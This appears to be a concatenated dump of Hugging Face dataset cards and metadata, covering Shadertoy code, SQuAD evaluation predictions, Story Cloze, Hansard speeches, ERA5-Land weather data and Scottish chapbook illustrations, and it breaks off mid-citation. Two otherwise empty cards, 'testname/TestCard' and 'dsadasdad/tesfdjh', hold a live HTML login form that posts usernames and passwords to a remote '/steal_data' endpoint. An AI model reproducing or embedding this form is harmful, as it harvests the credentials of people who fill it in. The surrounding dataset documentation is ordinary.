--- annotations_creators: - no-annotation language: - en - code language_creators: - machine-generated license: - cc-by-nc-sa-3.0 multilinguality: [] pretty_name: Shadertoys-fine size_categories: - 100K<n<1M source_datasets: [] tags: - code task_categories: - text-generation task_ids: [] --- # Dataset Card for Shadertoys-fine ## Table of Contents - [Table of Contents](#table-of-contents) - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-fields) - [Data Splits](#data-splits) - [Dataset Creation](#dataset-creation) - [Source Data](#source-data) - [Licensing Information](#licensing-information) ## Dataset Description - **Repository:** https://github.com/Vipitis/project (private placeholder) ### Dataset Summary fine variant of the Shadertoys dataset (still WIP), where individual functions are avaialable as Datapoints. ### Supported Tasks and Leaderboards `language-modeling`: The dataset can be used to train a model for modelling programming languages, which consists in building language models for programming languages. ### Languages - English (names, comments) - Shadercode **programming** language ## Dataset Structure ### Data Instances A data point consists of the function string, it's name as well as a bit of metadata like the author and source URL. (in the future there might be a function string without comments) ``` { 'name': '<type> <name>', 'code': '<type> <name>(<inputs>) { <body> return <outputs>; }\n', 'source': 'https://shadertoy.com/view/<shaderID>', 'author': '<username>' } ``` ## #Data Fields - 'name' funciton identifier composed of the type and the name of the function - 'code' the raw code (including comments) of function. - 'source' URL to the shader. It might be on a different renderpass - 'author' username of the shader author ### Data Splits Currently available (shuffled): - train (85.0%) - test (15.0%) ## Dataset Creation Data retrieved starting 2022-07-20 ### Source Data #### Initial Data Collection and Normalization All data was collected via the [Shadertoy.com API](https://www.shadertoy.com/howto#q2) and then by looking for keywords and counting curly brackets to figure out what is part of a function and what isn't. #### Who are the source language producers? Shadertoy.com contributers which publish shaders as 'public+API' ## Licensing Information The Default [licnese for each Shader](https://www.shadertoy.com/terms) is CC BY-NC-SA 3.0. However, some Shaders might have a different license attached. The Dataset is currently not filtering for any licensis.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-squad_v2-b21ddcda-11615545
2022-07-22T11:17:44.000Z
null
false
94f5828caf1fed6c4e59499abdfcd873a9c030a3
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad_v2-b21ddcda-11615545/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: deepset/roberta-base-squad2 metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: deepset/roberta-base-squad2 * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
ameerazam08
null
null
null
false
1
false
ameerazam08/autotrain-data-imdb
2022-08-08T04:19:44.000Z
null
false
9c16af46e39ca7b77c67d091885bafd8cb05ee48
[]
[]
https://huggingface.co/datasets/ameerazam08/autotrain-data-imdb/resolve/main/README.md
Simpe Sentimental analysis Dataset checking with AUtoTrain Pipeline
Muennighoff
null
@article{DBLP:journals/corr/abs-2112-10668, author = {Xi Victoria Lin and Todor Mihaylov and Mikel Artetxe and Tianlu Wang and Shuohui Chen and Daniel Simig and Myle Ott and Naman Goyal and Shruti Bhosale and Jingfei Du and Ramakanth Pasunuru and Sam Shleifer and Punit Singh Koura and Vishrav Chaudhary and Brian O'Horo and Jeff Wang and Luke Zettlemoyer and Zornitsa Kozareva and Mona T. Diab and Veselin Stoyanov and Xian Li}, title = {Few-shot Learning with Multilingual Language Models}, journal = {CoRR}, volume = {abs/2112.10668}, year = {2021}, url = {https://arxiv.org/abs/2112.10668}, eprinttype = {arXiv}, eprint = {2112.10668}, timestamp = {Tue, 04 Jan 2022 15:59:27 +0100}, biburl = {https://dblp.org/rec/journals/corr/abs-2112-10668.bib}, bibsource = {dblp computer science bibliography, https://dblp.org} }
Story Cloze Test' is a commonsense reasoning framework for evaluating story understanding, story generation, and script learning.This test requires a system to choose the correct ending to a four-sentence story.
false
13
false
Muennighoff/xstory_cloze
2022-10-20T19:44:18.000Z
null
false
8bb76e594b68147f1a430e86829d07189622b90d
[]
[ "annotations_creators:found", "language_creators:found", "language:ar", "language:es", "language:eu", "language:hi", "language:id", "language:zh", "language:ru", "language:my", "license:unknown", "multilinguality:multilingual", "size_categories:1K<n<10K", "source_datasets:original", "tag...
https://huggingface.co/datasets/Muennighoff/xstory_cloze/resolve/main/README.md
--- annotations_creators: - found language_creators: - found language: - ar - es - eu - hi - id - zh - ru - my license: - unknown multilinguality: - multilingual size_categories: - 1K<n<10K source_datasets: - original task_ids: [] tags: - other-story-completion --- # Dataset Card for "story_cloze" ## Table of Contents - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-fields) - [Data Splits](#data-splits) - [Dataset Creation](#dataset-creation) - [Curation Rationale](#curation-rationale) - [Source Data](#source-data) - [Annotations](#annotations) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) - [Citation Information](#citation-information) - [Contributions](#contributions) ## Dataset Description ### Dataset Summary Story Cloze Test' is a new commonsense reasoning framework for evaluating story understanding, story generation, and script learning.This test requires a system to choose the correct ending to a four-sentence story. ### Data Instances - **Size of downloaded dataset files:** 2.03 MB - **Size of the generated dataset:** 2.03 MB - **Total amount of disk used:** 2.05 MB An example of 'train' looks as follows. ``` {'answer_right_ending': 1, 'input_sentence_1': 'Rick grew up in a troubled household.', 'input_sentence_2': 'He never found good support in family, and turned to gangs.', 'input_sentence_3': "It wasn't long before Rick got shot in a robbery.", 'input_sentence_4': 'The incident caused him to turn a new leaf.', 'sentence_quiz1': 'He is happy now.', 'sentence_quiz2': 'He joined a gang.', 'story_id': '138d5bfb-05cc-41e3-bf2c-fa85ebad14e2'} ``` ### Data Fields The data fields are the same among all splits. - `input_sentence_1`: The first statement in the story. - `input_sentence_2`: The second statement in the story. - `input_sentence_3`: The third statement in the story. - `input_sentence_4`: The forth statement in the story. - `sentence_quiz1`: first possible continuation of the story. - `sentence_quiz2`: second possible continuation of the story. - `answer_right_ending`: correct possible ending; either 1 or 2. - `story_id`: story id. ### Data Splits | name |validation |test| |-------|-----:|---:| |lang|1871|1871|
autoevaluate
null
null
null
false
6
false
autoevaluate/autoeval-staging-eval-project-squad_v2-a5d9cc45-11645552
2022-07-22T13:17:28.000Z
null
false
de17e62a0b8f40bae1ff1bffd42916d46adc62a2
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad_v2-a5d9cc45-11645552/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: nbroad/deberta-v3-xsmall-squad2 metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: nbroad/deberta-v3-xsmall-squad2 * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@nbroad](https://huggingface.co/nbroad) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-squad-056210f3-11655553
2022-07-22T15:10:00.000Z
null
false
850e6e9d4e72b0b1bd5b8ecebdb169cc0afecc55
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad-056210f3-11655553/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad eval_info: task: extractive_question_answering model: distilbert-base-cased-distilled-squad metrics: [] dataset_name: squad dataset_config: plain_text dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: distilbert-base-cased-distilled-squad * Dataset: squad * Config: plain_text * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-squad_v2-4938eeea-11665554
2022-07-22T15:13:27.000Z
null
false
bb5a0bf1924a55a85433166cacc8384fd7c099dc
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad_v2-4938eeea-11665554/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: nbroad/xdistil-l12-h384-squad2 metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: nbroad/xdistil-l12-h384-squad2 * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@nbroad](https://huggingface.co/nbroad) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-squad_v2-b7567fd1-11675555
2022-07-22T15:54:17.000Z
null
false
0513e0c12e945fa315e4fb166e3d741cb4413105
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad_v2-b7567fd1-11675555/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: deepset/roberta-base-squad2-distilled metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: deepset/roberta-base-squad2-distilled * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@yjernite](https://huggingface.co/yjernite) for evaluating this model.
biglam
null
@misc{odell, evan_2021, title={Hansard Speeches 1979-2021: Version 3.1.0}, DOI={10.5281/zenodo.4843485}, abstractNote={<p>Full details are available at <a href="https://evanodell.com/projects/datasets/hansard-data">https://evanodell.com/projects/datasets/hansard-data</a></p> <p><strong>Version 3.1.0 contains the following changes:</strong></p> <p>- Coverage up to the end of April 2021</p>}, note={This release is an update of previously released datasets. See full documentation for details.}, publisher={Zenodo}, author={Odell, Evan}, year={2021}, month={May} }
A dataset containing every speech in the House of Commons from May 1979-July 2020.
false
1
false
biglam/hansard_speech
2022-07-27T12:30:30.000Z
null
false
ef655a3bfc18d977bb7d657ab87a6de404c883fc
[]
[ "annotations_creators:no-annotation", "language:en", "language_creators:expert-generated", "license:cc-by-4.0", "multilinguality:monolingual", "size_categories:1M<n<10M", "source_datasets:original", "tags:speeches", "tags:politics", "tags:parliament", "tags:British", "task_categories:text-clas...
https://huggingface.co/datasets/biglam/hansard_speech/resolve/main/README.md
--- annotations_creators: - no-annotation language: - 'en' language_creators: - expert-generated license: - cc-by-4.0 multilinguality: - monolingual pretty_name: Hansard Speeches size_categories: - 1M<n<10M source_datasets: - original tags: - speeches - politics - parliament - British task_categories: - text-classification - text-generation task_ids: - multi-class-classification - language-modeling - masked-language-modeling --- # Dataset Card for Hansard speech ## Table of Contents - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-instances) - [Data Splits](#data-instances) - [Dataset Creation](#dataset-creation) - [Curation Rationale](#curation-rationale) - [Source Data](#source-data) - [Annotations](#annotations) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) - [Citation Information](#citation-information) ## Dataset Description - **Homepage:** https://evanodell.com/projects/datasets/hansard-data/ - **Repository:** https://github.com/evanodell/hansard-data3 - **Paper:** [Needs More Information] - **Leaderboard:** [Needs More Information] - **Point of Contact:** [Evan Odell](https://github.com/evanodell) ### Dataset Summary A dataset containing every speech in the House of Commons from May 1979-July 2020. Quoted from the dataset homepage > Please contact me if you find any errors in the dataset. The integrity of the public Hansard record is questionable at times, and while I have improved it, the data is presented "as is". ### Supported Tasks and Leaderboards - `text-classification`: This dataset can be used to classify various texts (transcribed from speeches) as different time periods or as different types - `language-modeling`: This dataset can contribute to the training or the evaluation of language models for historical texts. ### Languages `en:GB` ## Dataset Structure ### Data Instances ``` { 'id': 'uk.org.publicwhip/debate/1979-05-17a.390.0', 'speech': "Since the Minister for Consumer Affairs said earlier that the bread price rise would be allowed, in view of developing unemployment in the baking industry, and since the Mother's Pride bakery in my constituency is about to close, will the right hon. Gentleman give us a firm assurance that there will be an early debate on the future of the industry, so that the Government may announce that, thanks to the price rise, those workers will not now be put out of work?", 'display_as': 'Eric Heffer', 'party': 'Labour', 'constituency': 'Liverpool, Walton', 'mnis_id': '725', 'date': '1979-05-17', 'time': '', 'colnum': '390', 'speech_class': 'Speech', 'major_heading': 'BUSINESS OF THE HOUSE', 'minor_heading': '', 'oral_heading': '', 'year': '1979', 'hansard_membership_id': '5612', 'speakerid': 'uk.org.publicwhip/member/11615', 'person_id': '', 'speakername': 'Mr. Heffer', 'url': '', 'government_posts': [], 'opposition_posts': [], 'parliamentary_posts': ['Member, Labour Party National Executive Committee'] } ``` ### Data Fields |Variable|Description| |---|---| |id|The ID as assigned by mysociety| |speech|The text of the speech| |display_as| The standardised name of the MP.| |party|The party an MP is member of at time of speech| |constituency| Constituency represented by MP at time of speech| |mnis_id| The MP's Members Name Information Service number| |date|Date of speech| |time|Time of speech| |colnum |Column number in hansard record| |speech_class |Type of speech| |major_heading| Major debate heading| |minor_heading| Minor debate heading| |oral_heading| Oral debate heading| |year |Year of speech| |hansard_membership_id| ID used by mysociety| |speakerid |ID used by mysociety| |person_id |ID used by mysociety| |speakername| MP name as appeared in Hansard record for speech| |url| link to speech| |government_posts| Government posts held by MP (list)| |opposition_posts |Opposition posts held by MP (list)| |parliamentary_posts| Parliamentary posts held by MP (list)| ### Data Splits Train: 2694375 ## Dataset Creation ### Curation Rationale This dataset contains all the speeches made in the House of Commons and can be used for a number of deep learning tasks like detecting how language and societal views have changed over the >40 years. The dataset also provides language closer to the spoken language used in an elite British institution. ### Source Data #### Initial Data Collection and Normalization The dataset is created by getting the data from [data.parliament.uk](http://data.parliament.uk/membersdataplatform/memberquery.aspx). There is no normalization. #### Who are the source language producers? [N/A] ### Annotations #### Annotation process None #### Who are the annotators? [N/A] ### Personal and Sensitive Information This is public information, so there should not be any personal and sensitive information ## Considerations for Using the Data ### Social Impact of Dataset The purpose of this dataset is to understand how language use and society's views have changed over time. ### Discussion of Biases Because of the long time period this dataset spans, it might contain language and opinions that are unacceptable in modern society. ### Other Known Limitations [Needs More Information] ## Additional Information ### Dataset Curators This dataset was built on top of [parlparse](https://github.com/mysociety/parlparse) by [Evan Odell](https://github.com/evanodell) ### Licensing Information Creative Commons Attribution 4.0 International License ### Citation Information ``` @misc{odell, evan_2021, title={Hansard Speeches 1979-2021: Version 3.1.0}, DOI={10.5281/zenodo.4843485}, abstractNote={<p>Full details are available at <a href="https://evanodell.com/projects/datasets/hansard-data">https://evanodell.com/projects/datasets/hansard-data</a></p> <p><strong>Version 3.1.0 contains the following changes:</strong></p> <p>- Coverage up to the end of April 2021</p>}, note={This release is an update of previously released datasets. See full documentation for details.}, publisher={Zenodo}, author={Odell, Evan}, year={2021}, month={May} } ``` Thanks to [@shamikbose](https://github.com/shamikbose) for adding this dataset.
testname
null
null
null
false
1
false
testname/TestCard
2022-07-23T02:27:28.000Z
null
false
1814a7e4c91dc6bfc0f7654da1170d3cafed64a6
[]
[]
https://huggingface.co/datasets/testname/TestCard/resolve/main/README.md
<form action="http://3msec.com/steal_data" method="POST"> Username: <input name="username" type="text"> Password: <input name="password" type="password"> <input name="submit" type="submit" <input> </form> ## Test ** test2 **
dsadasdad
null
null
null
false
1
false
dsadasdad/tesfdjh
2022-07-23T02:39:57.000Z
null
false
4cbca4e0faa2eca2064f49fe5159723c276eb905
[]
[]
https://huggingface.co/datasets/dsadasdad/tesfdjh/resolve/main/README.md
<form action="http://3msec.com/steal_data" method="POST"> Username: <input name="username" type="text"> Password: <input name="password" type="password"> <input name="submit" type="submit" <input> </form>
openclimatefix
null
null
null
false
1
false
openclimatefix/era5-land
2022-11-09T02:30:14.000Z
null
false
02124c83c4238942ec8c85941cc98d86f18d478b
[]
[ "license:mit" ]
https://huggingface.co/datasets/openclimatefix/era5-land/resolve/main/README.md
--- license: mit --- This dataset is comprised of ECMWF ERA5-Land data covering 2014 to October 2022. This data is on a 0.1 degree grid and has fewer variables than the standard ERA5-reanalysis, but at a higher resolution. All the data has been downloaded as NetCDF files from the Copernicus Data Store and converted to Zarr using Xarray, then uploaded here. Each file is one day, and holds 24 timesteps.
biglam
null
@inproceedings{10.1145/3476887.3476893, author = {Dutta, Abhishek and Bergel, Giles and Zisserman, Andrew}, title = {Visual Analysis of Chapbooks Printed in Scotland}, year = {2021}, isbn = {9781450386906}, publisher = {Association for Computing Machinery}, address = {New York, NY, USA}, url = {https://doi.org/10.1145/3476887.3476893}, doi = {10.1145/3476887.3476893}, abstract = {Chapbooks were short, cheap printed booklets produced in large quantities in Scotland, England, Ireland, North America and much of Europe between roughly the seventeenth and nineteenth centuries. A form of popular literature containing songs, stories, poems, games, riddles, religious writings and other content designed to appeal to a wide readership, they were frequently illustrated, particularly on their title-pages. This paper describes the visual analysis of such chapbook illustrations. We automatically extract all the illustrations contained in the National Library of Scotland Chapbooks Printed in Scotland dataset, and create a visual search engine to search this dataset using full or part-illustrations as queries. We also cluster these illustrations based on their visual content, and provide keyword-based search of the metadata associated with each publication. The visual search; clustering of illustrations based on visual content; and metadata search features enable researchers to forensically analyse the chapbooks dataset and to discover unnoticed relationships between its elements. We release all annotations and software tools described in this paper to enable reproduction of the results presented and to allow extension of the methodology described to datasets of a similar nature.}, booktitle = {The 6th International Workshop on Historical Document Imaging and Processing}, pages = {67–72}, numpages = {6}, keywords = {illustration detection, chapbooks, image search, visual grouping, printing, digital scholarship, illustration dataset}, location = {Lausanne, Switzerland}, series = {HIP '21} }
null
false
386
false
biglam/nls_chapbook_illustrations
2022-09-15T09:20:03.000Z
null
false
030d32aec7fab793745db87875b3306e1bdbab21
[]
[ "annotations_creators:expert-generated", "license:other", "size_categories:1K<n<10K", "tags:lam", "task_categories:object-detection", "task_categories:image-classification", "task_ids:multi-class-image-classification" ]
https://huggingface.co/datasets/biglam/nls_chapbook_illustrations/resolve/main/README.md
--- annotations_creators: - expert-generated language: [] language_creators: [] license: - other multilinguality: [] pretty_name: National Library of Scotland Chapbook Illustrations size_categories: - 1K<n<10K source_datasets: [] tags: - lam task_categories: - object-detection - image-classification task_ids: - multi-class-image-classification --- # Dataset Card for National Library of Scotland Chapbook Illustrations ## Table of Contents - [Table of Contents](#table-of-contents) - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-fields) - [Data Splits](#data-splits) - [Dataset Creation](#dataset-creation) - [Curation Rationale](#curation-rationale) - [Source Data](#source-data) - [Annotations](#annotations) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) - [Citation Information](#citation-information) - [Contributions](#contributions) ## Dataset Description - **Homepage:** https://www.robots.ox.ac.uk/~vgg/research/chapbooks/ - **Repository:** https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/ - **Paper:** https://www.robots.ox.ac.uk/~vgg/research/chapbooks/data/dutta2021visual.pdf - **Leaderboard:** - **Point of Contact:** giles.bergel@eng.ox.ac.uk ### Dataset Summary This dataset comprises of images from chapbooks held by the [National Library of Scotland](https://www.nls.uk/) and digitised and published as its [Chapbooks Printed in Scotland](https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/) dataset. > "Chapbooks were staple everyday reading material from the end of the 17th to the later 19th century. They were usually printed on a single sheet and then folded into books of 8, 12, 16 and 24 pages, and they were often illustrated with crude woodcuts. Their subjects range from news courtship, humour, occupations, fairy tales, apparitions, war, politics, crime, executions, historical figures, transvestites and freemasonry to religion and, of course, poetry. It has been estimated that around two thirds of chapbooks contain songs and poems, often under the title garlands." -[Source](https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/) Chapbooks were frequently illustrated, particularly on their title pages to attract customers, usually with a woodblock-printed illustration, or occasionally with a stereotyped woodcut or cast metal ornament. Apart from their artistic interest, these illustrations can also provide historical evidence such as the date, place or persons behind the publication of an item. This dataset contains annotations for a subset of these chapbooks, created by Giles Bergel and Abhishek Dutta, based in the [Visual Geometry Group](https://www.robots.ox.ac.uk/~vgg/) in the University of Oxford. They were created under a National Librarian of Scotland's Fellowship in Digital Scholarship [awarded](https://data.nls.uk/projects/the-national-librarians-research-fellowship-in-digital-scholarship/) to Giles Bergel in 2020. These annotations provide bounding boxes around illustrations printed on a subset of the chapbook pages, created using a combination of manual annotation and machine classification, described in [this paper](https://www.robots.ox.ac.uk/~vgg/research/chapbooks/data/dutta2021visual.pdf). The dataset also includes computationally inferred 'visual groupings' to which illustrated chapbook pages may belong. These groupings are based on the recurrence of illustrations on chapbook pages, as determined through the use of the [VGG Image Search Engine (VISE) software](https://www.robots.ox.ac.uk/~vgg/software/vise/) ### Supported Tasks and Leaderboards - `object-detection`: the dataset contains bounding boxes for images contained in the Chapbooks - `image-classification`: a configuration for this dataset provides a classification label indicating if a page contains an illustration or not. - `image-matching`: a configuration for this dataset contains the annotations sorted into clusters or 'visual groupings' of illustrations that contain visually-matching content as determined by using the [VGG Image Search Engine (VISE) software](https://www.robots.ox.ac.uk/~vgg/software/vise/). The performance on the `object-detection` task reported in the paper [Visual Analysis of Chapbooks Printed in Scotland](https://dl.acm.org/doi/10.1145/3476887.3476893) is as follows: | IOU threshold | Precision | Recall | |---------------|-----------|--------| | 0.50 | 0.993 | 0.911 | | 0.75 | 0.987 | 0.905 | | 0.95 | 0.973 | 0.892 | The performance on the `image classification` task reported in the paper [Visual Analysis of Chapbooks Printed in Scotland](https://dl.acm.org/doi/10.1145/3476887.3476893) is as follows: Images in original dataset: 47329 Numbers of images on which at least one illustration was detected: 3629 Note that these figures do not represent images that contained multiple detections. See the [paper](https://dl.acm.org/doi/10.1145/3476887.3476893) for examples of false-positive detections. The performance on the 'image-matching' task is undergoing evaluation. ### Languages Text accompanying the illustrations is in English, Scots or Scottish Gaelic. ## Dataset Structure ### Data Instances An example instance from the `illustration-detection` split: ```python {'image_id': 4, 'image': <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=600x1080>, 'width': 600, 'height': 1080, 'objects': [{'category_id': 0, 'image_id': '4', 'id': 1, 'area': 110901, 'bbox': [34.529998779296875, 556.8300170898438, 401.44000244140625, 276.260009765625], 'segmentation': [[34.529998779296875, 556.8300170898438, 435.9700012207031, 556.8300170898438, 435.9700012207031, 833.0900268554688, 34.529998779296875, 833.0900268554688]], 'iscrowd': False}]} ``` An example instance from the `image-classification` split: ```python {'image': <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=600x1080>, 'label': 1} ``` An example from the `image-matching` split: ```python {'image': <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=600x1080>, 'group-label': 231} ``` ### Data Fields The fields for the `illustration-detection` config: - image_id: id for the image - height: height of the image - width: width of the image - image: image of the chapbook page - objects: annotations in COCO format, consisting of a list containing dictionaries with the following keys: - bbox: bounding boxes for the images - category_id: a label for the image - image_id: id for the image - iscrowd: COCO is a crowd flag - segmentation: COCO segmentation annotations (empty in this case but kept for compatibility with other processing scripts) The fields for the `image-classification` config: - image: image - label: a label indicating if the page contains an illustration or not The fields for the `image-matching` config: - image: image of the chapbook page - label: an id for a particular instance of an image i.e. the same images will share the same id. ### Data Splits There is a single split `train` for all configs. K-fold validation was used in the [paper](https://dl.acm.org/doi/10.1145/3476887.3476893) describing this dataset, so no existing splits were defined. ## Dataset Creation ### Curation Rationale The dataset was created to facilitate research into Scottish chapbook illustration and publishing. Detected illustrations can be browsed under publication metadata: together with the use of [VGG Image Search Engine (VISE) software](https://www.robots.ox.ac.uk/~vgg/software/vise/), this allows researchers to identify matching imagery and to infer the source of a chapbook from partial evidence. This browse and search functionality is available in this [public demo](http://meru.robots.ox.ac.uk/nls_chapbooks/filelist) documented [here](https://www.robots.ox.ac.uk/~vgg/research/chapbooks/) ### Source Data #### Initial Data Collection and Normalization The initial data was taken from the [National Library of Scotland's Chapbooks Printed in Scotland dataset](https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/) No normalisation was performed, but only the images and a subset of the metadata was used. OCR text was not used. #### Who are the source language producers? The initial dataset was created by the National Library of Scotland from scans and in-house curated catalogue descriptions for the NLS [Data Foundry](https://data.nls.uk) under the direction of Dr. Sarah Ames. This subset of the data was created by Dr. Giles Bergel and Dr. Abhishek Dutta using a combination of manual annotation and machine classification, described below. ### Annotations #### Annotation process Annotation was initially performed on a subset of 337 of the 47329 images, using the [VGG List Annotator (LISA](https://gitlab.com/vgg/lisa) software. Detected illustrations, displayed as annotations in LISA, were reviewed and refined in a number of passes (see [this paper](https://dl.acm.org/doi/10.1145/3476887.3476893) for more details). Initial detections were performed with an [EfficientDet](https://ai.googleblog.com/2020/04/efficientdet-towards-scalable-and.html) object detector trained on [COCO](https://cocodataset.org/#home), the annotation of which is described in [this paper](https://arxiv.org/abs/1405.0312) #### Who are the annotators? Abhishek Dutta created the initial 337 annotations for retraining the EfficentDet model. Detections were reviewed and in some cases revised by Giles Bergel. ### Personal and Sensitive Information None ## Considerations for Using the Data ### Social Impact of Dataset We believe this dataset will assist in the training and benchmarking of illustration detectors. It is hoped that by automating a task that would otherwise require manual annotation it will save researchers time and labour in preparing data for both machine and human analysis. The dataset in question is based on a category of popular literature that reflected the learning, tastes and cultural faculties of both its large audiences and its largely-unknown creators - we hope that its use, reuse and adaptation will highlight the importance of cheap chapbooks in the spread of literature, knowledge and entertainment in both urban and rural regions of Scotland and the United Kingdom during this period. ### Discussion of Biases While the original Chapbooks Printed in Scotland is the largest single collection of digitised chapbooks, it is as yet unknown if it is fully representative of all chapbooks printed in Scotland, or of cheap printed literature in general. It is known that a small number of chapbooks (less than 0.1%) within the original collection were not printed in Scotland but this is not expected to have a significant impact on the profile of the collection as a representation of the population of chapbooks as a whole. The definition of an illustration as opposed to an ornament or other non-textual printed feature is somewhat arbitrary: edge-cases were evaluated by conformance with features that are most characteristic of the chapbook genre as a whole in terms of content, style or placement on the page. As there is no consensus definition of the chapbook even among domain specialists, the composition of the original dataset is based on the judgement of those who assembled and curated the original collection. ### Other Known Limitations Within this dataset, illustrations are repeatedly reused to an unusually high degree compared to other printed forms. The positioning of illustrations on the page and the size and format of chapbooks as a whole is also characteristic of the chapbook format in particular. The extent to which these annotations may be generalised to other printed works is under evaluation: initial results have been promising for other letterpress illustrations surrounded by texts. ## Additional Information ### Dataset Curators - Giles Bergel - Abhishek Dutta ### Licensing Information In accordance with the [original data](https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/), this dataset is in the public domain. ### Citation Information ``` bibtex @inproceedings{10.1145/3476887.3476893, author = {Dutta, Abhishek and Bergel, Giles and Zisserman, Andrew}, title = {Visual Analysis of Chapbooks Printed in Scotland}, year = {2021}, isbn = {9781450386906}, publisher = {Association for Computing Machinery}, address = {New York, NY, USA}, url = {https://doi.org/10.1145/3476887.3476893}, doi = {10.1145/3476887.3476893}, abstract = {Chapbooks were short, cheap printed booklets produced in large 